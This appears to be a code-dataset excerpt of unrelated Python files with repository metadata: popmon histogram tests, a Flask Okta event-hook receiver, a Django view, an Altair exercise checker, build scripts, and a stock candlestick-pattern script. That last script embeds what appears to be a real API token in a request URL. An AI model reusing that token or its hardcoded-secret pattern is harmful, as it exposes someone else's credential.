shutil.copyfile(new_file, path_file)
make_executable(path_file)
print("Also copied to: %s" % path_file)
print("")
elif len(contents) == 0:
raise Exception("Tar file %s is empty!" % tar_file_path)
else:
raise Exception("Expecting only one file in %s!" % tar_file_path)
else:
# Not a .zip file or a .tar.gz file. Just a direct download.
if "Driver" in file_name or "driver" in file_name:
print("Making [%s] executable ..." % file_name)
make_executable(file_path)
print("[%s] is now ready for use!" % file_name)
print("Location of [%s]:\n%s\n" % (file_name, file_path))
if __name__ == "__main__":
main()
| 45.6841
| 79
| 0.555754
|
4a112be894a1ccede23cefcc2cda63acd5618b15
| 107
|
py
|
Python
|
querv/__init__.py
|
boweeb/querv
|
23f832018d915fe46ff85bd62b3fdd662328ae2e
|
[
"0BSD"
] | null | null | null |
querv/__init__.py
|
boweeb/querv
|
23f832018d915fe46ff85bd62b3fdd662328ae2e
|
[
"0BSD"
] | null | null | null |
querv/__init__.py
|
boweeb/querv
|
23f832018d915fe46ff85bd62b3fdd662328ae2e
|
[
"0BSD"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'Jesse Butcher'
__email__ = 'boweeb@gmail.com'
__version__ = '0.2.0'
| 17.833333
| 30
| 0.64486
|
4a112c5907f0191d437cac62a30bb1c6e91a8e88
| 648
|
py
|
Python
|
django_hotel/src/home/views.py
|
darkares23/django-hotelSite
|
71886deb27bad291d03bd7e5a2a64f63b6f889e0
|
[
"MIT"
] | null | null | null |
django_hotel/src/home/views.py
|
darkares23/django-hotelSite
|
71886deb27bad291d03bd7e5a2a64f63b6f889e0
|
[
"MIT"
] | null | null | null |
django_hotel/src/home/views.py
|
darkares23/django-hotelSite
|
71886deb27bad291d03bd7e5a2a64f63b6f889e0
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from property.models import Category, Property
from agents.models import Agent
from django.db.models import Count
# Create your views here.
def home(request):
category_list = Category.objects.annotate(
property_count=Count('property')).values('category_name', 'property_count', 'image')
property_list = Property.objects.all()
agent_list = Agent.objects.all()
template = 'home/home.html'
context = {
'category_list_home': category_list,
'property_list_home': property_list,
'agent_list_home': agent_list,
}
return render(request, template, context)
| 29.454545
| 92
| 0.717593
|
4a112c623505c3c5998b80c32485f8d106563b7a
| 2,020
|
py
|
Python
|
exercises/en/test_02_11.py
|
UBC-MDS/exploratory-data-viz
|
83b704ce10d1ff5e10bfd4cdfa872ac52993fd54
|
[
"CC-BY-4.0"
] | null | null | null |
exercises/en/test_02_11.py
|
UBC-MDS/exploratory-data-viz
|
83b704ce10d1ff5e10bfd4cdfa872ac52993fd54
|
[
"CC-BY-4.0"
] | 88
|
2020-12-04T06:56:51.000Z
|
2021-05-10T22:02:45.000Z
|
exercises/en/test_02_11.py
|
UBC-MDS/exploratory-data-viz
|
83b704ce10d1ff5e10bfd4cdfa872ac52993fd54
|
[
"CC-BY-4.0"
] | 4
|
2021-01-13T09:30:57.000Z
|
2021-08-03T20:49:31.000Z
|
def test():
# Here we can either check objects created in the solution code, or the
# string value of the solution, available as __solution__. A helper for
# printing formatted messages is available as __msg__. See the testTemplate
# in the meta.json for details.
# If an assertion fails, the message will be displayed
# Since we haven't started assigning charts to variable names yet,
# this might be the better way to test for the first exercise.
# Maybe even for later exercises.
assert not penguin_bar is None, "Your answer does not exist. Have you passed in the correct variable?"
assert type(penguin_bar) == type(alt.Chart()), "Your answer is not an Altair Chart object. Check to make sure that you have assigned an alt.Chart object to penguin_bar."
assert penguin_bar.data.equals(penguins_df) and penguin_bar.data.shape == (344, 7), "Make sure you are using the penguins dataset."
assert penguin_bar.mark == 'bar', "Make sure you are using the bar mark type."
assert (penguin_bar.encoding.x.shorthand in {'count()', 'count():quantitative', 'count():Q'} or
penguin_bar.encoding.x.field in {'count()', 'count():quantitative', 'count():Q'}), "Make sure you are using 'count()' as the x-axis encoding."
assert (penguin_bar.encoding.y.field in {'species', 'species:nominal', 'species:N'} or
penguin_bar.encoding.y.shorthand in {'species', 'species:nominal', 'species:N'}), "Make sure you are using 'species' as the y-axis encoding."
assert penguin_bar.encoding.y.sort != alt.utils.schemapi.Undefined, "Make sure you specify the sort argument for the y-axis encoding."
assert type(penguin_bar.title) == str and len(penguin_bar.title) >= 5, "Make sure you specify a descriptive title for the penguin_bar plot."
assert penguin_bar.height == 150, "Make sure you specify the plot height of 150."
assert penguin_bar.width == 300, "Make sure you specify the plot width of 300."
__msg__.good("You're correct, well done!")
| 84.166667
| 173
| 0.715842
|
4a112dbdf61f6110f77f524914a01b186769246f
| 2,133
|
py
|
Python
|
update-sha1sums.py
|
LoneWolfSG/android_device_xiaomi_msm8937-common
|
c866c0846812b29f80c6fa0cc7de2c7cf11311ee
|
[
"Apache-2.0"
] | 10
|
2018-08-11T16:51:50.000Z
|
2021-09-06T06:04:25.000Z
|
update-sha1sums.py
|
LoneWolfSG/android_device_xiaomi_msm8937-common
|
c866c0846812b29f80c6fa0cc7de2c7cf11311ee
|
[
"Apache-2.0"
] | 1
|
2018-12-06T12:55:25.000Z
|
2018-12-08T13:30:44.000Z
|
update-sha1sums.py
|
LoneWolfSG/android_device_xiaomi_msm8937-common
|
c866c0846812b29f80c6fa0cc7de2c7cf11311ee
|
[
"Apache-2.0"
] | 51
|
2018-08-21T09:49:42.000Z
|
2022-03-05T16:17:30.000Z
|
#!/usr/bin/env python
#
# Copyright (C) 2016 The CyanogenMod Project
# Copyright (C) 2017-2018 The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from hashlib import sha1
import sys
device='msm8937-common'
vendor='xiaomi'
lines = [ line for line in open('proprietary-files-qc.txt', 'r') ]
vendorPath = '../../../vendor/' + vendor + '/' + device + '/proprietary'
needSHA1 = False
def cleanup():
for index, line in enumerate(lines):
# Remove '\n' character
line = line[:-1]
# Skip empty or commented lines
if len(line) == 0 or line[0] == '#':
continue
# Drop SHA1 hash, if existing
if '|' in line:
line = line.split('|')[0]
lines[index] = '%s\n' % (line)
def update():
for index, line in enumerate(lines):
# Remove '\n' character
line = line[:-1]
# Skip empty lines
if len(line) == 0:
continue
# Check if we need to set SHA1 hash for the next files
if line[0] == '#':
needSHA1 = (' - from' in line)
continue
if needSHA1:
# Remove existing SHA1 hash
line = line.split('|')[0]
filePath = line.split(':')[1] if len(line.split(':')) == 2 else line
if filePath[0] == '-':
file = open('%s/%s' % (vendorPath, filePath[1:]), 'rb').read()
else:
file = open('%s/%s' % (vendorPath, filePath), 'rb').read()
hash = sha1(file).hexdigest()
lines[index] = '%s|%s\n' % (line, hash)
if len(sys.argv) == 2 and sys.argv[1] == '-c':
cleanup()
else:
update()
with open('proprietary-files-qc.txt', 'w') as file:
for line in lines:
file.write(line)
file.close()
| 26.6625
| 74
| 0.622597
|
4a11316144762ad2afcdb770d02133cd45d8bf9f
| 985
|
py
|
Python
|
tools/python-okta-eventhook-server/flask-app.py
|
flypenguin/scripts-misc
|
e29fcdcf349dbf4e70a33dfb7f9d2a190d64636a
|
[
"MIT"
] | 3
|
2019-08-23T00:59:19.000Z
|
2022-02-22T02:39:01.000Z
|
tools/python-okta-eventhook-server/flask-app.py
|
flypenguin/scripts-misc
|
e29fcdcf349dbf4e70a33dfb7f9d2a190d64636a
|
[
"MIT"
] | null | null | null |
tools/python-okta-eventhook-server/flask-app.py
|
flypenguin/scripts-misc
|
e29fcdcf349dbf4e70a33dfb7f9d2a190d64636a
|
[
"MIT"
] | 4
|
2020-07-29T15:01:57.000Z
|
2021-05-03T16:02:48.000Z
|
#!/usr/bin/env python
from flask import Flask
from flask import request
from flask.views import View
from json import dumps
from time import time
from datetime import datetime as dt
from os import mkdir
from os.path import join
app = Flask(__name__)
timestamp = dt.now().strftime("%Y-%m-%d_%H.%M.%S")
dirname = f"events-{timestamp}"
counter = 0
@app.route("/health", methods=["GET"])
def get_health():
return "OK", 200
@app.route("/", methods=["GET"])
def get_verify():
header_value = request.headers.get("X-Okta-Verification-Challenge", "nope")
rv = {"verification": header_value}
print("Verification: ", rv)
return rv, 200
@app.route("/", methods=["POST"])
def post_event():
global counter
json = request.get_json()
if json:
with open(join(dirname, f"{counter}"), "w") as outfile:
outfile.write(dumps(json, indent=2))
counter += 1
return "", 200
if __name__ == "__main__":
mkdir(dirname)
app.run()
| 20.520833
| 79
| 0.652792
|
4a113293f0483ffdbbf66af67bf696237c5a70d9
| 2,235
|
py
|
Python
|
setup.py
|
abingham/swagger-to
|
a1ef9f46561d39809da0e6ab356427a247815d92
|
[
"MIT"
] | null | null | null |
setup.py
|
abingham/swagger-to
|
a1ef9f46561d39809da0e6ab356427a247815d92
|
[
"MIT"
] | null | null | null |
setup.py
|
abingham/swagger-to
|
a1ef9f46561d39809da0e6ab356427a247815d92
|
[
"MIT"
] | null | null | null |
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
import os
from setuptools import setup, find_packages
# pylint: disable=redefined-builtin
here = os.path.abspath(os.path.dirname(__file__)) # pylint: disable=invalid-name
with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read() # pylint: disable=invalid-name
setup(
name='swagger_to',
version='4.0.1', # Don't forget to update changelog!
description='Generate server and client code from Swagger (OpenAPI 2.0) specification',
long_description=long_description,
url='https://github.com/Parquery/swagger-to',
author='Marko Ristin',
author_email='marko@parquery.com',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
license="License :: OSI Approved :: MIT License",
keywords='swagger code generation python elm go typescript server client angular',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
install_requires=['pyyaml>=3.12', 'jinja2>=2.10,<3', 'icontract>=2.0.1,<3', 'jsonschema>=3,<4'],
extras_require={
'dev': [
'mypy==0.782',
'pylint==2.5.3',
'yapf==0.20.2',
'pydocstyle>=3.0.0,<4',
'requests_mock>=1.8.0',
],
},
py_modules=['swagger_to'],
package_data={"swagger_to": ["py.typed"]},
entry_points={
'console_scripts': [
'swagger_to_go_server.py = swagger_to.bin.swagger_to_go_server:main',
'swagger_to_py_client.py = swagger_to.bin.swagger_to_py_client:main',
'swagger_to_ts_angular5_client.py = swagger_to.bin.swagger_to_ts_angular5_client:main',
'swagger_to_elm_client.py = swagger_to.bin.swagger_to_elm_client:main',
'swagger_style.py = swagger_to.bin.swagger_style:main',
],
})
| 37.881356
| 100
| 0.6434
|
4a1132d3acb5ab204cccfdfd98dd05f64066146d
| 7,791
|
py
|
Python
|
sources/concept_analysis/ilp_samples/picking.py
|
lthamm/concept-embeddings-and-ilp
|
27592c6424147a2fbb54d7daebc92cd72b3f4a0c
|
[
"MIT"
] | 3
|
2020-11-02T12:21:29.000Z
|
2021-08-02T14:01:37.000Z
|
sources/concept_analysis/ilp_samples/picking.py
|
lthamm/concept-embeddings-and-ilp
|
27592c6424147a2fbb54d7daebc92cd72b3f4a0c
|
[
"MIT"
] | 2
|
2020-11-06T07:58:13.000Z
|
2022-03-13T16:11:30.000Z
|
sources/concept_analysis/ilp_samples/picking.py
|
lthamm/concept-embeddings-and-ilp
|
27592c6424147a2fbb54d7daebc92cd72b3f4a0c
|
[
"MIT"
] | 1
|
2020-11-03T14:54:16.000Z
|
2020-11-03T14:54:16.000Z
|
"""Functions to evaluate the main model and pick according samples for ILP.
Run as script from project root as
`python3 script/picking.py`
When called as script, will pick for each prediction class the same amount of samples from the test
set that are closest to the decision boundary and copy those images into a destination folder.
For the settings see the settings section.
"""
import os
import shutil
from typing import Union, List, Iterable
import PIL.Image
import numpy as np
import pandas as pd
import torch
import torchvision as tv
from tqdm import tqdm
import model
from sources.model.finetuning import model_loaders
to_tens = tv.transforms.ToTensor()
to_img = tv.transforms.ToPILImage()
def get_model_results(model: torch.nn.Module,
dataset_root: str,
save_as: str = None,
device: Union[torch.device, str] = None,
splits: Iterable[str] = ('train', 'test'),
gt_classes: Iterable[str] = ('pos', 'neg')) -> pd.DataFrame:
"""Collect predictions of main_model for all samples in dataset_root.
The dataset_root is assumed to have the structure
dataset_root > split > ground_truth_class > <image files>.
:param model: the model to evaluate
:param device: if given, the device to run on
:param dataset_root: the root directory of the dataset
:param save_as: optional .csv file path to save the results in (overwrites!)
:param splits: the dataset splits to evaluate
:param gt_classes: the ground truth classes to evaluate
"""
sub_results: List[pd.DataFrame] = []
with torch.no_grad():
for split in splits:
for gt_class in gt_classes:
folder = os.path.join(dataset_root, split, gt_class)
folder_res = get_model_results_for_folder(
model, folder, device=device, pbar_desc="{}, {}".format(split, gt_class))
sub_results.append(folder_res.assign(split=split, ground_truth=gt_class))
results = pd.concat(sub_results, ignore_index=True)
if save_as is not None:
results.to_csv(save_as)
return results
def get_model_results_for_folder(model: torch.nn.Module, folder: str,
device: Union[torch.device, str] = None,
pbar_desc: str = None) -> pd.DataFrame:
"""Collect model float prediction for all image files in folder.
The model must return a 2D tensor of size (batch_size, binary predictions).
All non-directory files ending with '.png' in folder are assumed to be valid image files
loadable by PIL.Image.open.
:param model: the model to use
:param device: if given, the device to move the model onto before evaluation
:param folder: the folder to search for image files in
:param pbar_desc: description for the progress bar
:return: pd.DataFrame with columns 'img' (the file name of the image relative to the folder),
and 'pred' (the float sigmoid of the prediction of the model).
"""
with torch.no_grad():
model.eval()
if device is not None:
model.to(device)
img_fns = [fn for fn in os.listdir(folder)
if os.path.isfile(os.path.join(folder, fn)) and fn.endswith('.png')]
row_list = []
for img_fn in tqdm(img_fns, desc=pbar_desc): # TODO: batch-processing
img = PIL.Image.open(os.path.join(folder, img_fn))
img_t = to_tens(img).to(device)
pred_t = torch.sigmoid(model(img_t.unsqueeze(0)).squeeze(0))
row_list.append({'img': img_fn, 'pred': float(pred_t)})
return pd.DataFrame(row_list)
def select_by_decision_boundary(preds: pd.DataFrame, num_imgs: int) -> List[str]:
"""Return a list of image paths that are closest to model decision boundary.
The paths are relative to the dataset root assumed in the prediction information.
"""
preds = preds.assign(dist_to_border=lambda r: np.abs(r.pred - 0.5))
# preds.nsmallest did weird things
smallest = preds.sort_values(by=['dist_to_border']).head(num_imgs)
# get relative paths:
imgs = smallest.apply(lambda row: os.path.join(row.split, row.ground_truth, row.img), axis=1)
return list(imgs)
def create_samples_folder(model: torch.nn.Module, dataset_root: str, dest_root: str,
num_imgs_per_cls: int,
splits: Iterable[str] = None,
csv_file: str = None, device: Union[str, torch.device] = None):
"""Select samples closest to decision boundary from dataset_root and copy them to dest_root.
The resulting collections for each respected split can be used as samples_root for generating
ILP samples from analysis results.
For each prediction class (positive predictions > 0.5, negative predictions < 0.5)
at most num_imgs_per_cls are collected.
The folder hierarchy in dataset_root must be:
dataset_root > split > ('pos'|'neg') > image files ending with .png;
the split is the dataset split, and 'pos' holds samples with positive ground truth,
'neg' samples with negative ground truth.
This hierarchy is mirrored for the destination root.
:param model: the model for which the samples must be close to the decision boundary
:param dataset_root: the root directory holding the samples (hierarchy described above)
:param dest_root: the root directory to which to copy selected samples; must not exist!
:param num_imgs_per_cls: the number of images predicted positive resp. negative to select
:param splits: splits for which to select samples; defaults to only test samples
:param csv_file: the intermediate CSV file to store the prediction information in;
will overwrite existing files
:param device: the device to work on for acquiring the model output
"""
splits = splits or ('test',)
if os.path.exists(dest_root):
raise FileExistsError("dest_root {} exists!".format(dest_root))
# collect predictions and save to intermediate .csv
preds = get_model_results(model, dataset_root, save_as=csv_file, device=device, splits=splits)
# select closest to decision boundary and save into dest_root
preds = preds[preds.split.isin(splits)]
pos_pred = select_by_decision_boundary(preds[preds.pred > 0.5], num_imgs_per_cls)
neg_pred = select_by_decision_boundary(preds[preds.pred <= 0.5], num_imgs_per_cls)
# save to dest_root
for img_rel_fp in [*pos_pred, *neg_pred]:
dest: str = os.path.join(dest_root, img_rel_fp)
os.makedirs(os.path.dirname(dest), exist_ok=True)
shutil.copy(os.path.join(dataset_root, img_rel_fp), dest)
NUM_IMGS_PER_CLS: int = 50
if __name__ == '__main__':
# region SETTINGS
# ---------------
PROJECT_ROOT = "." # assume that the script is called from project root
model_pkl_file = os.path.join(PROJECT_ROOT, "alexnet_finetuned.pkl")
MODEL = model_loaders.modified_alexnet(torch.load(model_pkl_file))
DEVICE = 'cuda'
DATASET_ROOT = os.path.join(PROJECT_ROOT, "dataset", "fasseg", "picasso_dataset")
DEST_ROOT = os.path.join(
PROJECT_ROOT, "dataset", "{}_ilp_samples".format(model.model_id(model_name="AlexNet",
model_pkl_file=model_pkl_file)))
CSV_FILE = os.path.join(PROJECT_ROOT, "models",
'{}_preds_test.csv'.format(MODEL.__class__.__name__.lower()))
# endregion
create_samples_folder(
model=MODEL,
dataset_root=DATASET_ROOT,
dest_root=DEST_ROOT,
num_imgs_per_cls=NUM_IMGS_PER_CLS,
csv_file=CSV_FILE,
device=DEVICE,
splits=('test',)
)
| 45.829412
| 104
| 0.676293
|
4a11336e35d30d6ba50bff36622bc2274a532100
| 1,319
|
py
|
Python
|
piercing_pattern.py
|
SamrathPalSingh/website-scripts
|
e852eb9b9153616ce9ac109820a4b912e57dba9a
|
[
"MIT"
] | null | null | null |
piercing_pattern.py
|
SamrathPalSingh/website-scripts
|
e852eb9b9153616ce9ac109820a4b912e57dba9a
|
[
"MIT"
] | null | null | null |
piercing_pattern.py
|
SamrathPalSingh/website-scripts
|
e852eb9b9153616ce9ac109820a4b912e57dba9a
|
[
"MIT"
] | null | null | null |
from trend import trend
import requests
#print(trend("AAPL"))
#### check for the previous trend ####
#### Downward trend required for this pattern ####
string = 'https://finnhub.io/api/v1/stock/candle?symbol='+ "AAPL" +'&resolution=D&count=2&token=bq24qknrh5rc5ioodhhg'
r = requests.get(string)
#print(len(r.json()['c']))
c0 = r.json()['c'][0]
h0 = r.json()['h'][0]
l0 = r.json()['l'][0]
o0 = r.json()['o'][0]
c1 = r.json()['c'][1]
h1 = r.json()['h'][1]
l1 = r.json()['l'][1]
o1 = r.json()['o'][1]
if( (c0 < o0) and (c1 > o1) ):
if((c0 >= o1) and (c1 > c0) and (o0 >= c1)):
if(((((c1-c0)/(o0-c0))*100)>50) and ((((c1-c0)/(o0-c0))*100)<100):
print("piercing pattern")
# elif( (c0 <= o1) and (o0 >= c1)):
# if(((((c1-o1)/(o0-c0))*100) > 50) and (((((c1-o1)/(o0-c0))*100) <100))):
# print("piercing pattern")
#### This case is handled in the Bullish Harami ####
#### Make sure this works properly ####
elif((c0 <= o1) and (o1 < o0) and (c1 >= o0)):
if(((((o0-o1)/(o0-c0))*100)>50) and (((((o0-o1)/(o0-c0))*100)< 100)):
print("piercing pattern")
#file.write("bearish Marabozu at " + str(i[0])+ "\n" + " c = " + str(c) + " h = " + str(h)+ " o= " + str(o) + " l = " + str(l) + "\n\n")
print("end")
| 33.820513
| 136
| 0.490523
|
4a113406bec0041ba7c8b0d5a4fcd5838d381695
| 15,992
|
py
|
Python
|
tests/popmon/analysis/test_hist_numpy.py
|
sbrugman-ing/popmon
|
a2ede6b7d56772404e9921545b83886e1a9b3806
|
[
"MIT"
] | null | null | null |
tests/popmon/analysis/test_hist_numpy.py
|
sbrugman-ing/popmon
|
a2ede6b7d56772404e9921545b83886e1a9b3806
|
[
"MIT"
] | null | null | null |
tests/popmon/analysis/test_hist_numpy.py
|
sbrugman-ing/popmon
|
a2ede6b7d56772404e9921545b83886e1a9b3806
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import pytest
from popmon.analysis.hist_numpy import (
assert_similar_hists,
check_similar_hists,
get_2dgrid,
get_consistent_numpy_1dhists,
get_consistent_numpy_2dgrids,
get_consistent_numpy_entries,
get_contentType,
prepare_2dgrid,
set_2dgrid,
)
from popmon.hist.histogram import HistogramContainer
from popmon.hist.patched_histogrammer import histogrammar as hg
def to_ns(x):
"""convert timestamp to nanosec since 1970-1-1"""
return pd.to_datetime(x).value
def unit(x):
"""unit return function"""
return x
def get_test_histograms1():
"""Get set 1 of test histograms"""
# dummy dataset with mixed types
# convert timestamp (col D) to nanosec since 1970-1-1
df = pd.util.testing.makeMixedDataFrame()
df["date"] = df["D"].apply(to_ns)
df["boolT"] = True
df["boolF"] = False
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist1 = hg.Categorize(unit("C"))
hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
hist3 = hg.SparselyBin(
origin=pd.Timestamp("2009-01-01").value,
binWidth=pd.Timedelta(days=1).value,
quantity=unit("date"),
value=hist2,
)
# fill them
hist1.fill.numpy(df)
hist2.fill.numpy(df)
hist3.fill.numpy(df)
hc1 = HistogramContainer(hist1)
hc2 = HistogramContainer(hist2)
hc3 = HistogramContainer(hist3)
return df, hc1, hc2, hc3
def get_test_histograms2():
"""Get set 2 of test histograms"""
# dummy dataset with mixed types
# convert timestamp (col D) to nanosec since 1970-1-1
df = pd.util.testing.makeMixedDataFrame()
# building 1d-, 2d-histogram (iteratively)
hist1 = hg.Categorize(unit("C"))
hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
hist3 = hg.Bin(5, 0, 5, unit("A"))
hist4 = hg.Categorize(unit("C"), value=hist3)
# fill them
hist1.fill.numpy(df)
hist2.fill.numpy(df)
hist3.fill.numpy(df)
hist4.fill.numpy(df)
hc1 = HistogramContainer(hist1)
hc2 = HistogramContainer(hist2)
hc3 = HistogramContainer(hist3)
hc4 = HistogramContainer(hist4)
return df, hc1, hc2, hc3, hc4
def test_histogram():
"""Test the dummy histogram we're working with below"""
df, hc1, hc2, hc3 = get_test_histograms1()
hist1 = hc1.hist
hist2 = hc2.hist
hist3 = hc3.hist
assert hist1.entries == 5
assert hist1.n_dim == 1
assert hist1.size == 5
assert hist2.entries == 5
assert hist2.n_dim == 2
assert hist2.num == 5
assert hist3.entries == 5
assert hist3.n_dim == 3
assert hist3.num == 7
def test_get_contentType():
"""Test getting type of a histogram"""
df, hc1, hc2, hc3 = get_test_histograms1()
hist1 = hc1.hist
hist2 = hc2.hist
hist3 = hc3.hist
assert get_contentType(hist1) == "Categorize"
assert get_contentType(hist2) == "Bin"
assert get_contentType(hist3) == "SparselyBin"
@pytest.mark.filterwarnings("ignore:Input histogram only has")
def test_prepare_2dgrid():
"""Test preparation of grid for extraction of number of entries for 2d hists"""
df, hc1, hc2, hc3 = get_test_histograms1()
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist1 = hg.Categorize(unit("C"))
hist2 = hg.Bin(5, 0, 5, unit("A"), value=hist1)
hist3 = hg.SparselyBin(
origin=pd.Timestamp("2009-01-01").value,
binWidth=pd.Timedelta(days=1).value,
quantity=unit("date"),
value=hist2,
)
# fill them
hist1.fill.numpy(df)
hist2.fill.numpy(df)
hist3.fill.numpy(df)
xkeys1, ykeys1 = prepare_2dgrid(hist1)
xkeys2, ykeys2 = prepare_2dgrid(hist2)
xkeys3, ykeys3 = prepare_2dgrid(hist3)
np.testing.assert_array_equal(xkeys1, [])
np.testing.assert_array_equal(ykeys1, [])
np.testing.assert_array_equal(xkeys2, [0, 1, 2, 3, 4])
np.testing.assert_array_equal(ykeys2, ["foo1", "foo2", "foo3", "foo4", "foo5"])
np.testing.assert_array_equal(xkeys3, [0, 1, 4, 5, 6])
np.testing.assert_array_equal(ykeys3, [0, 1, 2, 3, 4])
@pytest.mark.filterwarnings("ignore:Input histogram only has")
def test_set_2dgrid():
"""Test setting the grid for extraction of number of entries for 2d hists"""
df, hc1, hc2, hc3 = get_test_histograms1()
hist1 = hc1.hist
hist2 = hc2.hist
hist3 = hc3.hist
xkeys1, ykeys1 = prepare_2dgrid(hist1)
xkeys2, ykeys2 = prepare_2dgrid(hist2)
xkeys3, ykeys3 = prepare_2dgrid(hist3)
grid1 = set_2dgrid(hist1, xkeys1, ykeys1)
grid2 = set_2dgrid(hist2, xkeys2, ykeys2)
grid3 = set_2dgrid(hist3, xkeys3, ykeys3)
grid_comp = np.asarray(
[
[1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0],
]
)
assert (grid1 == np.zeros((0, 0))).all()
assert (grid2 == grid_comp).all()
assert (grid3 == grid_comp).all()
@pytest.mark.filterwarnings("ignore:Input histogram only has")
def test_get_2dgrid():
"""Test extraction of number of entries for 2d hists"""
df, hc1, hc2, hc3 = get_test_histograms1()
hist1 = hc1.hist
hist2 = hc2.hist
hist3 = hc3.hist
grid1 = get_2dgrid(hist1)
grid2 = get_2dgrid(hist2)
grid3 = get_2dgrid(hist3)
grid_comp = np.asarray(
[
[1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0],
]
)
assert (grid1 == np.zeros((0, 0))).all()
assert (grid2 == grid_comp).all()
assert (grid3 == grid_comp).all()
def test_get_consistent_numpy_2dgrids():
"""Test extraction of number of entries for 2d hists
When first making bin_edges of input histograms consistent to each other.
"""
df1 = pd.DataFrame(
{
"A": [0, 1, 2, 3, 4, 3, 2, 1, 1, 1],
"C": ["f1", "f3", "f4", "f3", "f4", "f2", "f2", "f1", "f3", "f4"],
}
)
df2 = pd.DataFrame(
{
"A": [2, 3, 4, 5, 7, 4, 6, 5, 7, 8],
"C": ["f7", "f3", "f5", "f8", "f9", "f2", "f3", "f6", "f7", "f7"],
}
)
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist0 = hg.Categorize(unit("C"))
hist1 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"), value=hist0)
hist2 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"), value=hist0)
# fill them
hist0.fill.numpy(df1)
hist1.fill.numpy(df1)
hist2.fill.numpy(df2)
hc0 = HistogramContainer(hist0)
hc1 = HistogramContainer(hist1)
hc2 = HistogramContainer(hist2)
args = [""]
try:
get_consistent_numpy_2dgrids([hc0, hc0])
except ValueError as e:
args = e.args
grid2d_list = get_consistent_numpy_2dgrids([hc1, hc2])
g1 = np.asarray(
[
[1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 2.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
]
)
g2 = np.asarray(
[
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
]
)
grid2d_comp = [g1, g2]
# MB 20190828: not sure if this is the right way to test for exceptions.
assert (
args[0] == "Input histogram only has 1 dimensions (<2). Cannot compute 2d-grid."
)
for i in range(2):
assert (grid2d_list[i] == grid2d_comp[i]).all()
def test_get_consistent_numpy_1dhists():
"""Test extraction of number of entries and bin-edges/labels
When first making bin_edges/bin-labels of input histograms consistent to each other.
"""
df1 = pd.DataFrame({"A": [0, 1, 2, 3, 4, 3, 2, 1, 1, 1]})
df2 = pd.DataFrame({"A": [2, 3, 4, 5, 7, 4, 6, 5, 7, 8]})
# building 1d-, 2d-, and 3d-histogram (iteratively)
hist1 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
hist2 = hg.SparselyBin(origin=0.0, binWidth=1.0, quantity=unit("A"))
# fill them
hist1.fill.numpy(df1)
hist2.fill.numpy(df2)
hc1 = HistogramContainer(hist1)
hc2 = HistogramContainer(hist2)
nphist1, nphist2 = get_consistent_numpy_1dhists([hc1, hc2], get_bin_labels=False)
nphist_list, centers = get_consistent_numpy_1dhists([hc1, hc2], get_bin_labels=True)
entries1 = [1.0, 4.0, 2.0, 2.0, 1.0, 0.0, 0.0, 0.0, 0.0]
entries2 = [0.0, 0.0, 1.0, 1.0, 2.0, 2.0, 1.0, 2.0, 1.0]
bin_edges = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0]
